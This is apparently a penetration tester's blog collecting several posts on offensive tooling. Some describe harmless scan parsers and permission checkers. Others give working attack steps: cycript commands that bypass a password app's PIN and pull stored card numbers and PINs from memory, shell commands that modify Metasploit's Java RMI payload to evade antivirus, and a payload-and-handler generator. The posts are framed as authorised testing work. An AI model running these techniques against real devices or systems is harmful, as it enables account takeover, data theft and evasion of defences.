Hack Whack and Smack

Loading A Weaponised Interactive PowerShell Session With Metasploit

A colleague, @davehardy20, and I came up with this from an idea I had: it gives an interactive PowerShell session from Metasploit, using newly developed Metasploit payloads.

Check out the blog post here for more information – https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit

Enjoy

Python Share Enumerator

Hey,

I’ve been working with a few large clients and needed to search a lot of network shares with a standard user account to see if the shares looked dangerous or overly permissive for the user, e.g. an admin share has full Everyone permissions and the user can capture sensitive data. To do this I’ve been using the Metasploit smb_enumshares module and then manually looking through the list to see which ones were accessible. As you can imagine this can take some time and not be very useful; however, over a period of time I have seen some Hyper-V backups on shares that were accessible to users and could be downloaded and backdoored for the admin password hash etc.

This is a task well worth doing. So, to cut a long story short, I created a Python script to do it: basically give it user credentials and a CIDR subnet and it will enumerate all shares and files/folders that are available to the given user. Simples.

Usage: python ./shares.py <username> <password> <domain> <hostip> <cidr-rhosts>

[Screenshot: python]

Let me know what you think, but I’m sure you will find this extremely useful as I have already. A few dependencies are listed below:

#pip install https://pypi.python.org/packages/source/p/pysmb/pysmb-1.1.13.tar.gz
#smbconnection.py is another dependency

Download link: shares.py


Simple Nmap Parser

Hey,

I needed to parse an Nmap scan really simply and couldn’t find anything useful, so I created a simple C# application to do it. Thought others might find it useful; here’s a screenshot of the beast at work.

[Screenshots: NmapParser, nmap]


Nessus Parser in Python

I have been making a few programs in C# for parsing Nessus output, and while these have been really good I wanted to expand my knowledge and create a Python parser so that I can edit and change it on the fly while pentesting to get any specific information that I need or require. For example, I have used Nmap to find all the web services, but this never picks all of them up, whereas Nessus does and places a ‘svc_name=www’ under each port when this is the case, irrespective of whether it is SSL-based or not.

Then I have a list of hosts and ports that I can have some confidence in, and can start to further explore each web port with ‘nikto’ and possibly screenshot it with ‘wkhtmltoimage’.

To cut a long story short, I started writing my own class for this, then stumbled across this code: https://code.google.com/p/pynessus/. These classes allow you to call all their functions to parse scan output or deal directly with the Nessus scanning engine and run scans etc. I have only used this in the smallest way up to now but thought it’s an interesting blog and others could benefit from this too.

Here is an example script that pulls out all the web services from a Nessus scan and places them in a list with their respective port after a colon, e.g. 10.0.0.1:443.

import dotnessus_v2

# Path to the exported .nessus (v2 XML) report
preport = "/tmp/localhost.nessus"
rpt = dotnessus_v2.Report()
rpt.parse(preport)

# Print host:port for every finding Nessus tagged as a web service
for t in rpt.targets:
    for v in t.vulns:
        if v.get('svc_name') == 'www':
            print(t.name + ":" + v.get('port'))


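The script above depends on dotnessus_v2. As an added example that is not part of the original post or of pynessus, here is the same svc_name=www extraction done with only the standard library, run over a constructed .nessus v2 snippet (hosts, ports and plugin names are made up):

```python
"""Pull the host:port pairs Nessus tagged svc_name="www" out of a .nessus v2
export using only xml.etree. The SAMPLE_NESSUS report is constructed for
this demonstration and is not real scan output."""
import xml.etree.ElementTree as ET

SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="constructed-sample">
    <ReportHost name="10.0.0.1">
      <ReportItem port="80" svc_name="www" protocol="tcp" pluginName="Service Detection"/>
      <ReportItem port="443" svc_name="www" protocol="tcp" pluginName="Service Detection"/>
      <ReportItem port="443" svc_name="www" protocol="tcp" pluginName="SSL Certificate Cannot Be Trusted"/>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" pluginName="Service Detection"/>
    </ReportHost>
    <ReportHost name="10.0.0.2">
      <ReportItem port="8080" svc_name="www" protocol="tcp" pluginName="Web Server Detection"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

def services_by_name(nessus_xml, svc_name="www"):
    """Return a sorted, de-duplicated list of "host:port" strings for every
    ReportItem whose svc_name matches. Nessus writes one ReportItem per
    plugin result, so the same port appears many times per host; the set
    collapses those. Only TCP items are kept, which is what nikto and
    wkhtmltoimage can talk to."""
    root = ET.fromstring(nessus_xml)
    found = set()
    for host in root.iter("ReportHost"):
        name = host.get("name")
        for item in host.iter("ReportItem"):
            if item.get("svc_name") == svc_name and item.get("protocol") == "tcp":
                found.add((name, int(item.get("port"))))
    return ["%s:%d" % (h, p) for h, p in sorted(found)]

def services_from_file(path, svc_name="www"):
    """Same as above, reading the report from a .nessus file on disk."""
    with open(path) as f:
        return services_by_name(f.read(), svc_name)

if __name__ == "__main__":
    # One host:port per line, the same shape web-parse.py feeds to grab.sh
    for line in services_by_name(SAMPLE_NESSUS):
        print(line)
```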
Here is another example script that uses the other class to initiate a connection to the Nessus server and launch a scan. Once the scan has launched you can also use the script to download reports as shown below. I take no credit for creating these scripts as they have been created by the author; I merely have used the functions to pull out what data I want from Nessus and want to share this as I think it’s very useful.

import pynessus

server = "localhost"
port = "8834"
user = "nessus-user"
password = "nessus-password"

# Placeholders: set these to values from your own Nessus server
scan_name = "example-scan"          # placeholder: name for the new scan
policy_id = "<policy-id>"           # placeholder: ID of an existing scan policy
target_list_iter = ["10.0.0.1"]     # placeholder: iterable of targets to scan
report_uuid = "<report-uuid>"       # placeholder: UUID of the report to download

# Connect to the Nessus server and launch a scan with the chosen policy
n = pynessus.NessusServer(server, port, user, password)

n.launch_scan(scan_name, policy_id, target_list_iter)

# Download a completed report by its UUID
n.download_report(report_uuid)


Anyway, I thought it’s worth a simple blog; here’s the link to the class files. I also run these through a series of other little scripts to run nikto on all hosts as well as running a screenshot grab for all web-based services so that I can see them quickly. Here is a little bash script I wrote that takes the output from the above and gets a screen capture of all web services. First of all I run web-parse.py to get my host list like so:

python web-parse.py | sort | uniq | tee web-hosts.txt

Then I run the for loop below to run nikto against each host, followed by my bash script.

for host in $(cat web-hosts.txt); do nikto -h "$host" > "$host.txt"; done

grab.sh web-hosts.txt


#!/bin/sh

filename="$1"
while read -r line
do
    name=$line
    echo "Name read from file - $name"

    TIMEOUT=3

    # Screenshot the HTTP service; the watcher kills wkhtmltoimage if it hangs past TIMEOUT
    ( wkhtmltoimage "http://$name" "$name.jpg" ) & pid=$!
    ( sleep $TIMEOUT && kill -HUP $pid ) 2>/dev/null & watcher=$!
    wait $pid 2>/dev/null && pkill -HUP -P $watcher

    # Same again for HTTPS
    ( wkhtmltoimage "https://$name" "$name-ssl.jpg" ) & pid=$!
    ( sleep $TIMEOUT && kill -HUP $pid ) 2>/dev/null & watcher=$!
    wait $pid 2>/dev/null && pkill -HUP -P $watcher

done < "$filename"


Enjoy 🙂

Python AES Web Token Generator

Recently I was testing a web app that made use of AES encryption to generate tokens. I put together my own proof of concept code to generate the tokens and to decrypt the tokens using pycrypto. The code reads in strings from a separate file and then uses the key and IV with the AES algorithm to generate an AES encrypted/base64 encoded string. The method was a port of a Microsoft .NET standard written in VB. I’m sure the code is a copy from somewhere with a few amendments, so sorry if I stole your code! ;-P

Obviously for this to work you need the key, which was 16 bits long and pretty much unbreakable in the time I had, but it was retrievable in other ways. Anyway, just wanted to post this so that I was top of the leader board again! Woohoo!!

Code → AES-Token-Generator.py

Service Permission Checker (service-perms.exe)

Hi folks,

I slightly updated my program to show a few extra bits of information about the service. Firstly, it now shows whether that user can stop and start the service, including the running state. Also, it now shows the permissions on the parent folder in case these are different to those of the binary.

Happy hacking 🙂 Here is another link to the tool 

perms

Service ImagePath Permission Checker

Hi Everyone,

I know there are quite a few tools that do something similar to this already, but I wanted to create my own and just output all this data to an HTML file. ‘Simples’.

So basically this outputs a file called report.html and lists all the services and the permissions on those binaries. It also has a column on whether they are unquoted service paths. Quite neat; I’m looking to make loads of these types of tools for breakout testing. It’s also fairly useful when you have limited access to the box or need to download a tool that will run as a low-level user and just open it with tools on the workstation, usually Internet Explorer. The following screenshot shows an example of the output.

[Screenshot: services]

Take a look and let me know what you think. Hopefully I will be writing more into this so that it can do a lot more.
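The unquoted service path column boils down to one check on each service's ImagePath. As an added example that is not part of the service-perms tool, here is that logic in Python, run over a constructed set of service names and ImagePath values (all made up):

```python
"""Flag services whose ImagePath is unquoted and contains spaces, the check
behind the 'unquoted service path' column. SAMPLE_SERVICES is constructed
for this demonstration; the names and paths are not from any real host."""

# Constructed sample: service name -> ImagePath value as stored in the registry
SAMPLE_SERVICES = {
    "GoodQuoted":  r'"C:\Program Files\Vendor App\vsvc.exe" -service',
    "NoSpaces":    r"C:\Tools\agent.exe",
    "ArgsOnly":    r"C:\Windows\system32\svchost.exe -k netsvcs",
    "BadUnquoted": r"C:\Program Files\Vendor App\Sub Dir\updater.exe -run",
}

def unquoted_candidates(image_path):
    """Return the file names Windows would try before reaching the intended
    binary when it parses an unquoted path with spaces (the path is split at
    each space in turn until something executes). Each entry sits in a
    directory whose ACL an auditor must confirm is not writable by standard
    users. Quoted paths, and paths whose only spaces are in the arguments,
    return [] because they are not affected."""
    p = image_path.strip()
    if not p or p.startswith('"') or " " not in p:
        return []
    words = p.split(" ")
    candidates = []
    for i in range(1, len(words)):
        prefix = " ".join(words[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; the rest are arguments
        candidates.append(prefix + ".exe")
    return candidates

def audit(services):
    """Return {service: [candidate paths]} for every unquoted-path service."""
    findings = {}
    for name, path in services.items():
        cands = unquoted_candidates(path)
        if cands:
            findings[name] = cands
    return findings

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_SERVICES).items():
        print("%s: unquoted path, Windows would try %s" % (name, ", ".join(cands)))
```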

Download here

🙂

Metasploit Payload Generator Script – paygen

Hi,

When testing I always find myself doing more advanced exploitation on boxes and mostly use Metasploit to do all these tasks; however, I always forget the exact syntax for creating a Metasploit payload and then setting up a multi/handler.

Obviously there are loads of easy ways to do this, but I thought I would create a simple Python script that basically takes your IP from eth0, then asks what type of payload to create and the output location. Once it has generated this it will create a multi/handler session with all the same settings ready for you. This then makes it terribly easy to run paygen and then double-click the file from my Samba share.

It could be improved by adding AV bypass techniques such as Veil or Ultimate Payload, but for now I have just done the basics. Anyway, here is the script paygen; let me know thoughts, suggestions, insults etc……

PAYGEN

Have fun 🙂

iOS App Testing – Part 2

Okay so it might be a long time coming…

Part 2:

In part two we are again looking at password safe apps, but this time the app stores data in an unintelligible format (it looks to be encrypted, or at least encoded, based on the method calls used to read the file in). Either way the files are not in clear text, and from the class-dump we are calling an XFFile format which I couldn’t work out how to open. Part two is going to look at how to:

1. Execute actions

2. Mess with variables

3. Bypass logins and read data from apparently secure files.

Execute actions:

We have already followed the steps from part 1 detailing how to dump the class information from an encrypted app using clutch, and can now see that each function has a number of actions. Actions, as I am referring to them, are commands such as check-password or terminate application. The demo in this case will just be to lock the app, which, if put in a loop, could be particularly funny should someone be trying to access their information:

The class dump shows the following output under AppDelegate:

–CUT–

-(void)initFileCount;

-(void)freeVersionWarning;

-(id)cloudURL;

-(void)loadData;

-(void)lock;

-(void)takePicture;

-(void)dealloc;

-(void)rateMyApp;

–CUT–

Therefore it is possible to execute the action by calling the class method and appropriate action with:

[UIApp.delegate lock]

Some other interesting functionality can be seen such as takePicture and freeVersionWarning. The warning is particularly annoying. It would be interesting to change the message and have it pop up…

Messing with a variable or property value:

This is just a quick and dirty example to show how to change messages on the screen and set variables or booleans. The screen at the time of login shows a nice message stating that the user should enter a password. Well I think we should be modifying that to some slanderous dig about the individual’s manhood……or at least to inform them of this new-found predicament they are about to find themselves in as we move through the next section.

Anyway, on to changing the value:

Let’s start with where we are in the app on the screen and compare it to the method calls and associated variables.

cy# UIApp.keyWindow.rootViewController.visibleViewController

#"<InputView: 0x1fd67ed0>"

Reviewing InputView in the class-dump reveals a few interesting methods:

–CUT–

-(void)changeType:(id)type;

-(void)reloadViews;

-(id)init;

-(void)updateTittle:(id)tittle;

–CUT–

The one we are interested in is updateTittle. The command below shows how we can check the title message by calling inputViewTitle:

cy# [UIApp.keyWindow.rootViewController.visibleViewController inputViewTitle]

Before:

[Screenshot: originalmessage]

Now we can use updateTittle to change the message given to the user at the login screen:

cy# [UIApp.keyWindow.rootViewController.visibleViewController updateTittle: "Password is wrong mwahahaha"]

After:

[Screenshot: newmessage]

I have to rein in the insults so as not to offend all the women and children that visit the site…..

That was fun and all, but what about breaking stuff….fear not, we’re here; the first parts are important in changing and manipulating the app and its response.

Breaking Stuff:

The first thing I am going to demonstrate is how easy it is to bypass the PIN.

The InputView controller actually has a delegate called login; this can be found by running the following command and reviewed in the class-dump:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate

#"<login: 0x1fdc9fc0>"

There is no need to go into great detail here; it’s just the same as part one where we change a boolean function to return true. This was a little harder as there were multiple methods called and it required a bit more digging. Don’t forget there are a number of useful functions in cycript for exploring the app.

The following command can be used to make the inputDidTestingPassword: method return true, which results in the application allowing access with any PIN. This is important as it informs us that a comparison is done on the password:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate->isa.messages['inputDidTestingPassword:'] = function() { return true }

Stealing and Resetting the PIN:

The first thing we have to look at is the class-dump, which shows the file userData being read in at the start of the login method, which is the delegate of InputView:

[Screenshot: login-method]

Therefore, if it’s going to be loaded into memory I want to be able to read it, or at least that is the plan. The following commands detail how to read files; the file in this case is userData:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData

#"<XFFile: 0x1e56fc40>"

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data

@{"password":"1402","fileHidden":true}

[Screenshot: reading and changing pin]

And there she is…..cycript is awesome!!!

Now let’s consider our earlier task of changing the message……..

Yep, we can update the information in memory as per the screenshot above:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data = {"password":"1234","fileHidden":true}

{password:"1234",fileHidden:true}

We can now log in with the PIN 1234! HEHEHE, not to forget the message about manhood!……………This could be quite a shock to a user of the app who ends up locked out and abused!

And logged in:

[Screenshot: login]

It is possible to access other files in the same way. I was able to access the data while the app was open on the page, as can be seen below:

cy# UIApp.keyWindow.rootViewController.visibleViewController.file.data

@{"data":@[@{"key":"Account Number","value":"3131313131","type":6},@{"key":"PIN","value":"5555","type":4},@{"key":"Type","value":"MasterCard","type":12},@{"key":"Bank Name","value":"Happy Bank","type":7},@{"key":"Address","value":"","type":7},@{"key":"Owner","value":"","type":7},@{"key":"SWIFT Code","value":"","type":1},@{"key":"Routing Number","value":"","type":10},@{"key":"IBAN","value":"","type":10},@{"key":"Hotline","value":"","type":11},@{"key":"Notes","value":"","type":9}],"imgName":"154.png"}

The information available clearly details credit card information and PINs that would normally be secured, proving nothing is safe if your phone is rooted.

[Screenshot: creditcard details]

There will of course be a part three and the idea this time is not to wait so long and then rush something through ;-P

JavaRMI Remote Class Loading Exploitation with AV Bypass

Hi folks,

For some time now I have been finding the Java RMI remote class loading vulnerability and have been very successful with Metasploit; however, recently I have had Anti-Virus (AV) pick this up. While this is not a standard executable, my usual AV bypass techniques were useless, so I had to expand my research. For those who don’t know, Java Remote Method Invocation (RMI) services are used within applications to allow Java objects to be used from a remote location without the use of any authentication. If a client invokes a remote method, the client passes all the information in the form of a Java object to the RMI service for this to then be executed.

When passing the Object the client can also specify a Class Loader which specifies where the Java code for manipulating the Object can be found, this is typically a URL to a Jar file. Without authentication or verification, the server then downloads the Java object and executes it under the same permissions as the Java RMI service (usually SYSTEM).

As a pentester you can take advantage of this RMI service to load and execute Java code on the system. This can all be done using Metasploit; just search for java_rmi. Anyway, I am more interested in the times it fails because of Anti-Virus. To get around this I had to decompile the Payload.class file from within Metasploit and make some fundamental changes as seen below.

cd /usr/share/metasploit-framework/data/java/metasploit/
cp Payload.class Payload-backup.class
jad Payload.class

sed -i 's/spawn/runme/' Payload.jad
mv Payload.jad Payload.java
javac Payload.java

Once I did this I could successfully exploit this again. One thing to note is that I was using the Java target, so you end up with a Java Meterpreter shell, which you can escalate into a normal Meterpreter afterwards.

[Screenshot: javarmi]

There are probably better Java obfuscation techniques that may have done this easier so any comments would be appreciated.

Cheers 🙂